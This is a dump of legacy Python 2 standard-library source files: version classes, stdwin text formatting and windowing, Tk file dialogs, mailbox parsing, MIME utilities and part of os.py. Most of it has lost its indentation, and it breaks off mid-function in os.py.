The rationale for this version numbering system will be explained
in the distutils documentation.
"""
version_re = re.compile (r'^(\d+) \. (\d+) (\. (\d+))? ([ab](\d+))?$',
re.VERBOSE)
def parse (self, vstring):
match = self.version_re.match (vstring)
if not match:
raise ValueError, "invalid version number '%s'" % vstring
(major, minor, patch, prerelease, prerelease_num) = \
match.group (1, 2, 4, 5, 6)
if patch:
self.version = tuple (map (string.atoi, [major, minor, patch]))
else:
self.version = tuple (map (string.atoi, [major, minor]) + [0])
if prerelease:
self.prerelease = (prerelease[0], string.atoi (prerelease_num))
else:
self.prerelease = None
def __str__ (self):
if self.version[2] == 0:
vstring = string.join (map (str, self.version[0:2]), '.')
else:
vstring = string.join (map (str, self.version), '.')
if self.prerelease:
vstring = vstring + self.prerelease[0] + str (self.prerelease[1])
return vstring
def __cmp__ (self, other):
if isinstance (other, StringType):
other = StrictVersion (other)
compare = cmp (self.version, other.version)
if (compare == 0): # have to compare prerelease
# case 1: neither has prerelease; they're equal
# case 2: self has prerelease, other doesn't; other is greater
# case 3: self doesn't have prerelease, other does: self is greater
# case 4: both have prerelease: must compare them!
if (not self.prerelease and not other.prerelease):
return 0
elif (self.prerelease and not other.prerelease):
return -1
elif (not self.prerelease and other.prerelease):
return 1
elif (self.prerelease and other.prerelease):
return cmp (self.prerelease, other.prerelease)
else: # numeric versions don't match --
return compare # prerelease stuff doesn't matter
# end class StrictVersion
# The rules according to <NAME>:
# 1) a version number has 1 or more numbers separated by a period or by
# sequences of letters. If only periods, then these are compared
# left-to-right to determine an ordering.
# 2) sequences of letters are part of the tuple for comparison and are
# compared lexicographically
# 3) recognize the numeric components may have leading zeroes
#
# The LooseVersion class below implements these rules: a version number
# string is split up into a tuple of integer and string components, and
# comparison is a simple tuple comparison. This means that version
# numbers behave in a predictable and obvious way, but a way that might
# not necessarily be how people *want* version numbers to behave. There
# wouldn't be a problem if people could stick to purely numeric version
# numbers: just split on period and compare the numbers as tuples.
# However, people insist on putting letters into their version numbers;
# the most common purpose seems to be:
# - indicating a "pre-release" version
# ('alpha', 'beta', 'a', 'b', 'pre', 'p')
# - indicating a post-release patch ('p', 'pl', 'patch')
# but of course this can't cover all version number schemes, and there's
# no way to know what a programmer means without asking him.
#
# The problem is what to do with letters (and other non-numeric
# characters) in a version number. The current implementation does the
# obvious and predictable thing: keep them as strings and compare
# lexically within a tuple comparison. This has the desired effect if
# an appended letter sequence implies something "post-release":
# eg. "0.99" < "0.99pl14" < "1.0", and "5.001" < "5.001m" < "5.002".
#
# However, if letters in a version number imply a pre-release version,
# the "obvious" thing isn't correct. Eg. you would expect that
# "1.5.1" < "1.5.2a2" < "1.5.2", but under the tuple/lexical comparison
# implemented here, this just isn't so.
#
# Two possible solutions come to mind. The first is to tie the
# comparison algorithm to a particular set of semantic rules, as has
# been done in the StrictVersion class above. This works great as long
# as everyone can go along with bondage and discipline. Hopefully a
# (large) subset of Python module programmers will agree that the
# particular flavour of bondage and discipline provided by StrictVersion
# provides enough benefit to be worth using, and will submit their
# version numbering scheme to its domination. The free-thinking
# anarchists in the lot will never give in, though, and something needs
# to be done to accommodate them.
#
# Perhaps a "moderately strict" version class could be implemented that
# lets almost anything slide (syntactically), and makes some heuristic
# assumptions about non-digits in version number strings. This could
# sink into special-case-hell, though; if I was as talented and
# idiosyncratic as <NAME>, I'd go ahead and implement a class that
# somehow knows that "1.2.1" < "1.2.2a2" < "1.2.2" < "1.2.2pl3", and is
# just as happy dealing with things like "2g6" and "1.13++". I don't
# think I'm smart enough to do it right though.
#
# In any case, I've coded the test suite for this module (see
# ../test/test_version.py) specifically to fail on things like comparing
# "1.2a2" and "1.2". That's not because the *code* is doing anything
# wrong, it's because the simple, obvious design doesn't match my
# complicated, hairy expectations for real-world version numbers. It
# would be a snap to fix the test suite to say, "Yep, LooseVersion does
# the Right Thing" (ie. the code matches the conception). But I'd rather
# have a conception that matches common notions about version numbers.
class LooseVersion (Version):
"""Version numbering for anarchists and software realists.
Implements the standard interface for version number classes as
described above. A version number consists of a series of numbers,
separated by either periods or strings of letters. When comparing
version numbers, the numeric components will be compared
numerically, and the alphabetic components lexically. The following
are all valid version numbers, in no particular order:
1.5.1
1.5.2b2
161
3.10a
8.02
3.4j
1996.07.12
3.2.pl0
3.1.1.6
2g6
11g
0.960923
2.2beta29
1.13++
5.5.kw
2.0b1pl0
In fact, there is no such thing as an invalid version number under
this scheme; the rules for comparison are simple and predictable,
but may not always give the results you want (for some definition
of "want").
"""
component_re = re.compile(r'(\d+ | [a-z]+ | \.)', re.VERBOSE)
def __init__ (self, vstring=None):
if vstring:
self.parse (vstring)
def parse (self, vstring):
# I've given up on thinking I can reconstruct the version string
# from the parsed tuple -- so I just store the string here for
# use by __str__
self.vstring = vstring
components = filter (lambda x: x and x != '.',
self.component_re.split (vstring))
for i in range (len (components)):
try:
components[i] = int (components[i])
except ValueError:
pass
self.version = components
def __str__ (self):
return self.vstring
def __repr__ (self):
return "LooseVersion ('%s')" % str (self)
def __cmp__ (self, other):
if isinstance (other, StringType):
other = LooseVersion (other)
return cmp (self.version, other.version)
# end class LooseVersion
```
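A few comparisons implied by the docstrings above (illustrative; Python 2 routes <, == and friends through __cmp__):

```python
assert StrictVersion('0.4') == StrictVersion('0.4.0')     # implicit third component
assert StrictVersion('1.0.4a3') < StrictVersion('1.0.4')  # pre-release sorts earlier
assert str(StrictVersion('1.0.4b1')) == '1.0.4b1'
assert LooseVersion('1.5.1') < LooseVersion('1.5.2b2')    # plain tuple comparison
```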
#### File: Lib/lib-stdwin/formatter.py
```python
class formatter:
#
# Initialize a formatter instance.
# Pass the window's drawing object, and left, top, right
# coordinates of the drawing space as arguments.
#
def __init__(self, d, left, top, right):
self.d = d # Drawing object
self.left = left # Left margin
self.right = right # Right margin
self.v = top # Top of current line
self.center = 0
self.justify = 1
self.setfont('') # Default font
self._reset() # Prepare for new line
#
# Reset for start of fresh line.
#
def _reset(self):
self.boxes = [] # Boxes and glue still to be output
self.sum_width = 0 # Total width of boxes
self.sum_space = 0 # Total space between boxes
self.sum_stretch = 0 # Total stretch for space between boxes
self.max_ascent = 0 # Max ascent of current line
self.max_descent = 0 # Max descent of current line
self.avail_width = self.right - self.left
self.hang_indent = 0
#
# Set the current font, and compute some values from it.
#
def setfont(self, font):
self.font = font
self.d.setfont(font)
self.font_space = self.d.textwidth(' ')
self.font_ascent = self.d.baseline()
self.font_descent = self.d.lineheight() - self.font_ascent
#
# Add a word to the list of boxes; first flush if line is full.
# Space and stretch factors are expressed in fractions
# of the current font's space width.
# (Two variations: one without, one with explicit stretch factor.)
#
def addword(self, word, spacefactor):
self.addwordstretch(word, spacefactor, spacefactor)
#
def addwordstretch(self, word, spacefactor, stretchfactor):
width = self.d.textwidth(word)
if width > self.avail_width:
self._flush(1)
space = int(float(self.font_space) * float(spacefactor))
stretch = int(float(self.font_space) * float(stretchfactor))
box = (self.font, word, width, space, stretch)
self.boxes.append(box)
self.sum_width = self.sum_width + width
self.sum_space = self.sum_space + space
self.sum_stretch = self.sum_stretch + stretch
self.max_ascent = max(self.font_ascent, self.max_ascent)
self.max_descent = max(self.font_descent, self.max_descent)
self.avail_width = self.avail_width - width - space
#
# Flush current line and start a new one.
# Flushing twice is harmless (i.e. does not introduce a blank line).
# (Two versions: the internal one has a parameter for justification.)
#
def flush(self):
self._flush(0)
#
def _flush(self, justify):
if not self.boxes:
return
#
# Compute amount of stretch needed.
#
if justify and self.justify or self.center:
#
# Compute extra space to fill;
# this is avail_width plus glue from last box.
# Also compute available stretch.
#
last_box = self.boxes[len(self.boxes)-1]
font, word, width, space, stretch = last_box
tot_extra = self.avail_width + space
tot_stretch = self.sum_stretch - stretch
else:
tot_extra = tot_stretch = 0
#
# Output the boxes.
#
baseline = self.v + self.max_ascent
h = self.left + self.hang_indent
if self.center:
h = h + tot_extra / 2
tot_extra = tot_stretch = 0
for font, word, width, space, stretch in self.boxes:
self.d.setfont(font)
v = baseline - self.d.baseline()
self.d.text((h, v), word)
h = h + width + space
if tot_extra > 0 and tot_stretch > 0:
extra = stretch * tot_extra / tot_stretch
h = h + extra
tot_extra = tot_extra - extra
tot_stretch = tot_stretch - stretch
#
# Prepare for next line.
#
self.v = baseline + self.max_descent
self.d.setfont(self.font)
self._reset()
#
# Add vertical space; first flush.
# Vertical space is expressed in fractions of the current
# font's line height.
#
def vspace(self, lines):
self.vspacepixels(int(lines * self.d.lineheight()))
#
# Add vertical space given in pixels.
#
def vspacepixels(self, dv):
self.flush()
self.v = self.v + dv
#
# Set temporary (hanging) indent, for paragraph start.
# First flush.
#
def tempindent(self, space):
self.flush()
hang = int(float(self.font_space) * float(space))
self.hang_indent = hang
self.avail_width = self.avail_width - hang
#
# Add (permanent) left indentation. First flush.
#
def addleftindent(self, space):
self.flush()
self.left = self.left \
+ int(float(self.font_space) * float(space))
self._reset()
#
# Test procedure
#
def test():
import stdwin, stdwinq
from stdwinevents import *
try:
import mac
# Mac font assignments:
font1 = 'times', '', 12
font2 = 'times', 'b', 14
except ImportError:
# X11R4 font assignments
font1 = '*times-medium-r-*-120-*'
font2 = '*times-bold-r-*-140-*'
words = \
['The','quick','brown','fox','jumps','over','the','lazy','dog.']
words = words * 2
stage = 0
stages = [(0,0,'ragged'), (1,0,'justified'), (0,1,'centered')]
justify, center, title = stages[stage]
stdwin.setdefwinsize(300,200)
w = stdwin.open(title)
winsize = w.getwinsize()
while 1:
type, window, detail = stdwinq.getevent()
if type == WE_CLOSE:
break
elif type == WE_SIZE:
newsize = w.getwinsize()
if newsize <> winsize:
w.change((0,0), winsize)
winsize = newsize
w.change((0,0), winsize)
elif type == WE_MOUSE_DOWN:
stage = (stage + 1) % len(stages)
justify, center, title = stages[stage]
w.settitle(title)
w.change((0, 0), (1000, 1000))
elif type == WE_DRAW:
width, height = winsize
f = formatter(w.begindrawing(), 0, 0, width)
f.center = center
f.justify = justify
if not center:
f.tempindent(5)
for font in font1, font2, font1:
f.setfont(font)
for word in words:
space = 1 + (word[-1:] == '.')
f.addword(word, space)
if center and space > 1:
f.flush()
f.flush()
height = f.v
del f
w.setdocsize(0, height)
```
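The justification step in _flush() spreads the leftover width over the glue in proportion to each box's stretch, shrinking both running totals so rounding error never accumulates. A standalone sketch of that arithmetic (pure Python, no stdwin required; integer division as in the original):

```python
def distribute(stretches, tot_extra):
    # Mirrors the loop in formatter._flush(): each box receives
    # stretch * tot_extra / tot_stretch, and the totals shrink so
    # the final box absorbs any remainder.
    tot_stretch = sum(stretches)
    out = []
    for stretch in stretches:
        extra = 0
        if tot_extra > 0 and tot_stretch > 0:
            extra = stretch * tot_extra / tot_stretch
        out.append(extra)
        tot_extra = tot_extra - extra
        tot_stretch = tot_stretch - stretch
    return out

assert distribute([4, 4, 4], 10) == [3, 3, 4]   # all 10 pixels of slack spent
```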
#### File: Lib/lib-stdwin/gwin.py
```python
import stdwin, stdwinq
from stdwinevents import *
from mainloop import mainloop, register, unregister, windows
# Open a window
def open(title): # Open a generic window
w = stdwin.open(title)
stdwin.setdefwinsize(0, 0)
# Set default event handlers
w.draw = nop
w.char = nop
w.mdown = nop
w.mmove = nop
w.mup = nop
w.m2down = m2down
w.m2up = m2up
w.size = nop
w.move = nop
w.activate = w.deactivate = nop
w.timer = nop
# default command handlers
w.close = close
w.tab = tab
w.enter = enter
w.backspace = backspace
w.arrow = arrow
w.kleft = w.kup = w.kright = w.kdown = nop
w.dispatch = treatevent
register(w)
return w
def treatevent(e): # Handle a stdwin event
type, w, detail = e
if type == WE_DRAW:
w.draw(w, detail)
elif type == WE_MENU:
m, item = detail
m.action[item](w, m, item)
elif type == WE_COMMAND:
treatcommand(w, detail)
elif type == WE_CHAR:
w.char(w, detail)
elif type == WE_MOUSE_DOWN:
if detail[1] > 1: w.m2down(w, detail)
else: w.mdown(w, detail)
elif type == WE_MOUSE_MOVE:
w.mmove(w, detail)
elif type == WE_MOUSE_UP:
if detail[1] > 1: w.m2up(w, detail)
else: w.mup(w, detail)
elif type == WE_SIZE:
w.size(w, w.getwinsize())
elif type == WE_ACTIVATE:
w.activate(w)
elif type == WE_DEACTIVATE:
w.deactivate(w)
elif type == WE_MOVE:
w.move(w)
elif type == WE_TIMER:
w.timer(w)
elif type == WE_CLOSE:
w.close(w)
def treatcommand(w, type): # Handle a we_command event
if type == WC_CLOSE:
w.close(w)
elif type == WC_RETURN:
w.enter(w)
elif type == WC_TAB:
w.tab(w)
elif type == WC_BACKSPACE:
w.backspace(w)
elif type in (WC_LEFT, WC_UP, WC_RIGHT, WC_DOWN):
w.arrow(w, type)
# Methods
def close(w): # Close method
unregister(w)
del w.close # Delete our close function
w.close() # Call the close method
def arrow(w, detail): # Arrow key method
if detail == WC_LEFT:
w.kleft(w)
elif detail == WC_UP:
w.kup(w)
elif detail == WC_RIGHT:
w.kright(w)
elif detail == WC_DOWN:
w.kdown(w)
# Trivial methods
def tab(w): w.char(w, '\t')
def enter(w): w.char(w, '\n') # 'return' is a Python reserved word
def backspace(w): w.char(w, '\b')
def m2down(w, detail): w.mdown(w, detail)
def m2up(w, detail): w.mup(w, detail)
def nop(*args): pass
```
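A hypothetical caller (stdwin is long obsolete, so this is a sketch only): gwin.open() installs no-op handlers, so an application overrides just the ones it needs and enters mainloop():

```python
def mydraw(w, area):
    d = w.begindrawing()
    d.text((10, 10), 'hello, gwin')
    del d                      # release the drawing object

win = open('demo')             # gwin.open, which shadows the builtin
win.draw = mydraw              # replace one default handler
mainloop()                     # events arrive via w.dispatch = treatevent
```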
#### File: Lib/lib-stdwin/stdwinq.py
```python
import stdwin
# Events read ahead are stored in this queue.
#
queue = []
# Replacement for getevent().
#
def getevent():
if queue:
event = queue[0]
del queue[0]
return event
else:
return stdwin.getevent()
# Replacement for pollevent().
#
def pollevent():
if queue:
return getevent()
else:
return stdwin.pollevent()
# Push an event back in the queue.
#
def ungetevent(event):
queue.insert(0, event)
# Synchronize the display. It turns out that this is the way to
# force STDWIN to call XSync(), which some (esoteric) applications need.
# (This is stronger than just flushing -- it actually waits for a
# positive response from the X server on the last command issued.)
#
def sync():
while 1:
event = stdwin.pollevent()
if not event: break
queue.append(event)
```
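The read-ahead queue makes ungetevent() an exact inverse of getevent(); a sketch of the invariant (event tuples fabricated for illustration, and nothing here touches a real window, though importing the module still needs stdwin):

```python
e1 = (1, None, None)      # fake (type, window, detail) tuples
e2 = (2, None, None)
ungetevent(e2)
ungetevent(e1)            # most recently pushed back comes out first
assert getevent() == e1
assert getevent() == e2   # only an empty queue falls through to stdwin
```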
#### File: Lib/lib-tk/tkFileDialog.py
```python
from tkCommonDialog import Dialog
class _Dialog(Dialog):
def _fixoptions(self):
try:
# make sure "filetypes" is a tuple
self.options["filetypes"] = tuple(self.options["filetypes"])
except KeyError:
pass
def _fixresult(self, widget, result):
if result:
# keep directory and filename until next time
import os
path, file = os.path.split(result)
self.options["initialdir"] = path
self.options["initialfile"] = file
self.filename = result # compatibility
return result
#
# file dialogs
class Open(_Dialog):
"Ask for a filename to open"
command = "tk_getOpenFile"
class SaveAs(_Dialog):
"Ask for a filename to save as"
command = "tk_getSaveFile"
#
# convenience stuff
def askopenfilename(**options):
"Ask for a filename to open"
return apply(Open, (), options).show()
def asksaveasfilename(**options):
"Ask for a filename to save as"
return apply(SaveAs, (), options).show()
# FIXME: are the following two perhaps a bit too convenient?
def askopenfile(mode = "r", **options):
    "Ask for a filename to open, and return the opened file"
filename = apply(Open, (), options).show()
if filename:
return open(filename, mode)
return None
def asksaveasfile(mode = "w", **options):
    "Ask for a filename to save as, and return the opened file"
filename = apply(SaveAs, (), options).show()
if filename:
return open(filename, mode)
return None
# --------------------------------------------------------------------
# test stuff
if __name__ == "__main__":
print "open", askopenfilename(filetypes=[("all filez", "*")])
print "saveas", asksaveasfilename()
```
#### File: cpython/Lib/mailbox.py
```python
import rfc822
import os
class _Mailbox:
def __init__(self, fp):
self.fp = fp
self.seekp = 0
    def seek(self, pos, whence=0):
        if whence==1:           # Relative to current position
            self.pos = self.pos + pos
        elif whence==2:         # Relative to file's end
            self.pos = self.stop + pos
        else:                   # Default - absolute position
            self.pos = self.start + pos
def next(self):
while 1:
self.fp.seek(self.seekp)
try:
self._search_start()
except EOFError:
self.seekp = self.fp.tell()
return None
start = self.fp.tell()
self._search_end()
self.seekp = stop = self.fp.tell()
if start <> stop:
break
return rfc822.Message(_Subfile(self.fp, start, stop))
class _Subfile:
def __init__(self, fp, start, stop):
self.fp = fp
self.start = start
self.stop = stop
self.pos = self.start
def read(self, length = None):
if self.pos >= self.stop:
return ''
remaining = self.stop - self.pos
if length is None or length < 0:
length = remaining
elif length > remaining:
length = remaining
self.fp.seek(self.pos)
data = self.fp.read(length)
self.pos = self.fp.tell()
return data
def readline(self, length = None):
if self.pos >= self.stop:
return ''
if length is None:
length = self.stop - self.pos
self.fp.seek(self.pos)
data = self.fp.readline(length)
self.pos = self.fp.tell()
return data
def readlines(self, sizehint = -1):
lines = []
while 1:
line = self.readline()
if not line:
break
lines.append(line)
if sizehint >= 0:
sizehint = sizehint - len(line)
if sizehint <= 0:
break
return lines
def tell(self):
return self.pos - self.start
def seek(self, pos, whence=0):
if whence == 0:
self.pos = self.start + pos
elif whence == 1:
self.pos = self.pos + pos
elif whence == 2:
self.pos = self.stop + pos
def close(self):
del self.fp
class UnixMailbox(_Mailbox):
def _search_start(self):
while 1:
line = self.fp.readline()
if not line:
raise EOFError
if line[:5] == 'From ' and self._isrealfromline(line):
return
def _search_end(self):
while 1:
pos = self.fp.tell()
line = self.fp.readline()
if not line:
return
if line[:5] == 'From ' and self._isrealfromline(line):
self.fp.seek(pos)
return
# An overridable mechanism to test for From-line-ness.
# You can either specify a different regular expression
# or define a whole new _isrealfromline() method.
# Note that this only gets called for lines starting with
# the 5 characters "From ".
_fromlinepattern = r"From \s*[^\s]+\s+\w\w\w\s+\w\w\w\s+\d?\d\s+" \
r"\d?\d:\d\d(:\d\d)?(\s+[^\s]+)?\s+\d\d\d\d\s*$"
_regexp = None
def _isrealfromline(self, line):
if not self._regexp:
import re
self._regexp = re.compile(self._fromlinepattern)
return self._regexp.match(line)
class MmdfMailbox(_Mailbox):
def _search_start(self):
while 1:
line = self.fp.readline()
if not line:
raise EOFError
if line[:5] == '\001\001\001\001\n':
return
def _search_end(self):
while 1:
pos = self.fp.tell()
line = self.fp.readline()
if not line:
return
if line == '\001\001\001\001\n':
self.fp.seek(pos)
return
class MHMailbox:
def __init__(self, dirname):
import re
pat = re.compile('^[0-9][0-9]*$')
self.dirname = dirname
files = os.listdir(self.dirname)
self.boxes = []
for f in files:
if pat.match(f):
self.boxes.append(f)
def next(self):
if not self.boxes:
return None
fn = self.boxes[0]
del self.boxes[0]
fp = open(os.path.join(self.dirname, fn))
return rfc822.Message(fp)
class Maildir:
# Qmail directory mailbox
def __init__(self, dirname):
import string
self.dirname = dirname
self.boxes = []
# check for new mail
newdir = os.path.join(self.dirname, 'new')
for file in os.listdir(newdir):
if len(string.split(file, '.')) > 2:
self.boxes.append(os.path.join(newdir, file))
# Now check for current mail in this maildir
curdir = os.path.join(self.dirname, 'cur')
for file in os.listdir(curdir):
if len(string.split(file, '.')) > 2:
self.boxes.append(os.path.join(curdir, file))
def next(self):
if not self.boxes:
return None
fn = self.boxes[0]
del self.boxes[0]
fp = open(os.path.join(self.dirname, fn))
return rfc822.Message(fp)
class BabylMailbox(_Mailbox):
def _search_start(self):
while 1:
line = self.fp.readline()
if not line:
raise EOFError
if line == '*** EOOH ***\n':
return
def _search_end(self):
while 1:
pos = self.fp.tell()
line = self.fp.readline()
if not line:
return
if line == '\037\014\n':
self.fp.seek(pos)
return
def _test():
import time
import sys
import string
import os
args = sys.argv[1:]
if not args:
for key in 'MAILDIR', 'MAIL', 'LOGNAME', 'USER':
if os.environ.has_key(key):
mbox = os.environ[key]
break
else:
            print "Neither $MAILDIR, $MAIL, $LOGNAME nor $USER set -- who are you?"
return
else:
mbox = args[0]
if mbox[:1] == '+':
mbox = os.environ['HOME'] + '/Mail/' + mbox[1:]
elif not '/' in mbox:
mbox = '/usr/mail/' + mbox
if os.path.isdir(mbox):
if os.path.isdir(os.path.join(mbox, 'cur')):
mb = Maildir(mbox)
else:
mb = MHMailbox(mbox)
else:
fp = open(mbox, 'r')
mb = UnixMailbox(fp)
msgs = []
while 1:
msg = mb.next()
if msg is None:
break
msgs.append(msg)
msg.fp = None
if len(args) > 1:
num = string.atoi(args[1])
print 'Message %d body:'%num
msg = msgs[num-1]
msg.rewindbody()
sys.stdout.write(msg.fp.read())
else:
print 'Mailbox',mbox,'has',len(msgs),'messages:'
for msg in msgs:
f = msg.getheader('from') or ""
s = msg.getheader('subject') or ""
d = msg.getheader('date') or ""
print '%20.20s %18.18s %-30.30s'%(f, d[5:], s)
if __name__ == '__main__':
_test()
```
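_Subfile confines read(), readline() and seek() to the byte window [start, stop), which is how each rfc822.Message sees only its own text. A quick in-memory demonstration (illustrative, Python 2):

```python
from StringIO import StringIO

fp = StringIO('AAAA\nFrom x\nbody\nFrom y\n')
sub = _Subfile(fp, 5, 17)          # window over 'From x\nbody\n'
assert sub.readline() == 'From x\n'
assert sub.read() == 'body\n'
assert sub.read() == ''            # reads never pass stop
sub.seek(0)                        # offsets are relative to start
assert sub.readline() == 'From x\n'
```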
#### File: cpython/Lib/mimetools.py
```python
import os
import rfc822
import string
import tempfile
# A derived class of rfc822.Message that knows about MIME headers and
# contains some hooks for decoding encoded and multipart messages.
class Message(rfc822.Message):
def __init__(self, fp, seekable = 1):
rfc822.Message.__init__(self, fp, seekable)
self.encodingheader = \
self.getheader('content-transfer-encoding')
self.typeheader = \
self.getheader('content-type')
self.parsetype()
self.parseplist()
def parsetype(self):
str = self.typeheader
if str == None:
str = 'text/plain'
if ';' in str:
i = string.index(str, ';')
self.plisttext = str[i:]
str = str[:i]
else:
self.plisttext = ''
fields = string.splitfields(str, '/')
for i in range(len(fields)):
fields[i] = string.lower(string.strip(fields[i]))
self.type = string.joinfields(fields, '/')
self.maintype = fields[0]
self.subtype = string.joinfields(fields[1:], '/')
def parseplist(self):
str = self.plisttext
self.plist = []
while str[:1] == ';':
str = str[1:]
if ';' in str:
# XXX Should parse quotes!
end = string.index(str, ';')
else:
end = len(str)
f = str[:end]
if '=' in f:
i = string.index(f, '=')
f = string.lower(string.strip(f[:i])) + \
'=' + string.strip(f[i+1:])
self.plist.append(string.strip(f))
str = str[end:]
def getplist(self):
return self.plist
def getparam(self, name):
name = string.lower(name) + '='
n = len(name)
for p in self.plist:
if p[:n] == name:
return rfc822.unquote(p[n:])
return None
def getparamnames(self):
result = []
for p in self.plist:
i = string.find(p, '=')
if i >= 0:
result.append(string.lower(p[:i]))
return result
def getencoding(self):
if self.encodingheader == None:
return '7bit'
return string.lower(self.encodingheader)
def gettype(self):
return self.type
def getmaintype(self):
return self.maintype
def getsubtype(self):
return self.subtype
# Utility functions
# -----------------
# Return a random string usable as a multipart boundary.
# The method used is such that it is *very* unlikely that the same
# string of characters will ever occur again in the Universe,
# so the caller needn't check the data it is packing for the
# occurrence of the boundary.
#
# The boundary contains dots so you have to quote it in the header.
_prefix = None
def choose_boundary():
global _prefix
import time
import random
if _prefix == None:
import socket
import os
hostid = socket.gethostbyname(socket.gethostname())
try:
uid = `os.getuid()`
except:
uid = '1'
try:
pid = `os.getpid()`
except:
pid = '1'
_prefix = hostid + '.' + uid + '.' + pid
timestamp = '%.3f' % time.time()
seed = `random.randint(0, 32767)`
return _prefix + '.' + timestamp + '.' + seed
# Subroutines for decoding some common content-transfer-types
def decode(input, output, encoding):
if encoding == 'base64':
import base64
return base64.decode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.decode(input, output)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.decode(input, output)
if decodetab.has_key(encoding):
pipethrough(input, decodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
def encode(input, output, encoding):
if encoding == 'base64':
import base64
return base64.encode(input, output)
if encoding == 'quoted-printable':
import quopri
return quopri.encode(input, output, 0)
if encoding in ('uuencode', 'x-uuencode', 'uue', 'x-uue'):
import uu
return uu.encode(input, output)
if encodetab.has_key(encoding):
pipethrough(input, encodetab[encoding], output)
else:
raise ValueError, \
'unknown Content-Transfer-Encoding: %s' % encoding
# The following is no longer used for standard encodings
# XXX This requires that uudecode and mmencode are in $PATH
uudecode_pipe = '''(
TEMP=/tmp/@uu.$$
sed "s%^begin [0-7][0-7]* .*%begin 600 $TEMP%" | uudecode
cat $TEMP
rm $TEMP
)'''
decodetab = {
'uuencode': uudecode_pipe,
'x-uuencode': uudecode_pipe,
'uue': uudecode_pipe,
'x-uue': uudecode_pipe,
'quoted-printable': 'mmencode -u -q',
'base64': 'mmencode -u -b',
}
encodetab = {
'x-uuencode': 'uuencode tempfile',
'uuencode': 'uuencode tempfile',
'x-uue': 'uuencode tempfile',
'uue': 'uuencode tempfile',
'quoted-printable': 'mmencode -q',
'base64': 'mmencode -b',
}
def pipeto(input, command):
pipe = os.popen(command, 'w')
copyliteral(input, pipe)
pipe.close()
def pipethrough(input, command, output):
tempname = tempfile.mktemp()
try:
temp = open(tempname, 'w')
except IOError:
print '*** Cannot create temp file', `tempname`
return
copyliteral(input, temp)
temp.close()
pipe = os.popen(command + ' <' + tempname, 'r')
copybinary(pipe, output)
pipe.close()
os.unlink(tempname)
def copyliteral(input, output):
while 1:
line = input.readline()
if not line: break
output.write(line)
def copybinary(input, output):
BUFSIZE = 8192
while 1:
line = input.read(BUFSIZE)
if not line: break
output.write(line)
```
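A quick check of the header parsing above (illustrative, Python 2): parsetype() lower-cases and splits the type, parseplist() collects the ';'-separated parameters, and getparam() unquotes them:

```python
from StringIO import StringIO

m = Message(StringIO(
    'Content-Type: Multipart/Mixed; boundary="xyz.123"\n'
    'Content-Transfer-Encoding: 7BIT\n'
    '\n'
    'body\n'))
assert m.gettype() == 'multipart/mixed'
assert m.getmaintype() == 'multipart'
assert m.getparam('boundary') == 'xyz.123'
assert m.getencoding() == '7bit'
```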
#### File: cpython/Lib/os.py
```python
import sys
_names = sys.builtin_module_names
altsep = None
if 'posix' in _names:
name = 'posix'
linesep = '\n'
curdir = '.'; pardir = '..'; sep = '/'; pathsep = ':'
defpath = ':/bin:/usr/bin'
from posix import *
try:
from posix import _exit
except ImportError:
pass
import posixpath
path = posixpath
del posixpath
elif 'nt' in _names:
name = 'nt'
linesep = '\r\n'
curdir = '.'; pardir = '..'; sep = '\\'; pathsep = ';'
defpath = '.;C:\\bin'
from nt import *
for i in ['_exit']:
try:
exec "from nt import " + i
except ImportError:
pass
import ntpath
path = ntpath
del ntpath
elif 'dos' in _names:
name = 'dos'
linesep = '\r\n'
curdir = '.'; pardir = '..'; sep = '\\'; pathsep = ';'
defpath = '.;C:\\bin'
from dos import *
try:
from dos import _exit
except ImportError:
pass
import dospath
path = dospath
del dospath
elif 'os2' in _names:
name = 'os2'
linesep = '\r\n'
curdir = '.'; pardir = '..'; sep = '\\'; pathsep = ';'
defpath = '.;C:\\bin'
from os2 import *
try:
from os2 import _exit
except ImportError:
pass
import ntpath
path = ntpath
del ntpath
elif 'mac' in _names:
name = 'mac'
linesep = '\r'
curdir = ':'; pardir = '::'; sep = ':'; pathsep = '\n'
defpath = ':'
from mac import *
try:
from mac import _exit
except ImportError:
pass
import macpath
path = macpath
del macpath
else:
raise ImportError, 'no os specific module found'
del _names
sys.modules['os.path'] = path
# Super directory utilities.
# (Inspired by <NAME>; the doc strings are mostly his)
def makedirs(name, mode=0777):
"""makedirs(path [, mode=0777]) -> None
Super-mkdir; create a leaf directory and all intermediate ones.
Works like mkdir, except that any intermediate path segment (not
just the rightmost) will be created if it does not exist. This is
recursive.
"""
head, tail = path.split(name)
if head and tail and not path.exists(head):
makedirs(head, mode)
mkdir(name, mode)
def removedirs(name):
"""removedirs(path) -> None
    Super-rmdir; remove a leaf directory and all empty intermediate
    ones.  Works like rmdir except that, if the leaf directory is
    successfully removed, directories corresponding to rightmost path
    segments will be pruned away until either the whole path is
consumed or an error occurs. Errors during this latter phase are
ignored -- they generally mean that a directory was not empty.
"""
rmdir(name)
head, tail = path.split(name)
while head and tail:
try:
rmdir(head)
except error:
break
head, tail = path.split(head)
def renames(old, new):
"""renames(old, new) -> None
Super-rename; create directories as necessary and delete any left
empty. Works like rename, except creation of any intermediate
directories needed to make the new pathname good is attempted
first. After the rename, directories corresponding to rightmost
    path segments of the old name will be pruned away until either the
whole path is consumed or a nonempty directory is found.
Note: this function can fail with the new directory structure made
if you lack permissions needed to unlink the leaf directory or
file.
"""
head, tail = path.split(new)
if head and tail and not path.exists(head):
makedirs(head)
rename(old, new)
head, tail = path.split(old)
if head and tail:
try:
removedirs(head)
except error:
pass
# Make sure os.environ exists, at least
try:
environ
except NameError:
environ = {}
def execl(file, *args):
execv(file, args)
def execle(file, *args):
env = args[-1]
execve(file, args[:-1], env)
def execlp(file, *args):
execvp(file, args)
def execlpe(file, *args):
env = args[-1]
execvpe(file, args[:-1], env)
def execvp(file, args):
_execvpe(file, args)
def execvpe(file, args, env):
_execvpe(file, args, env)
_notfound = None
def _execvpe(file, args, env = None):
if env:
func = execve
argrest = (args, env)
else:
func = execv
argrest = (args,)
env = environ
global _notfound
head, tail = path.split(file)
if head:
apply(func, (file,) + argrest)
return
if env.has_key('PATH'):
envpath = env['PATH']
else:
envpath = defpath
import string
PATH = string.splitfields(envpath, pathsep)
if not _notfound:
import tempfile
# Exec a file that is guaranteed not to exist
try: execv(tempfile.mktemp(), ())
except error, _notfound: pass
exc, arg = error, _notfound
for dir in PATH:
fullname = path.join(dir, file)
try:
apply(func, (fullname,) + argrest)
except error, (errno, msg):
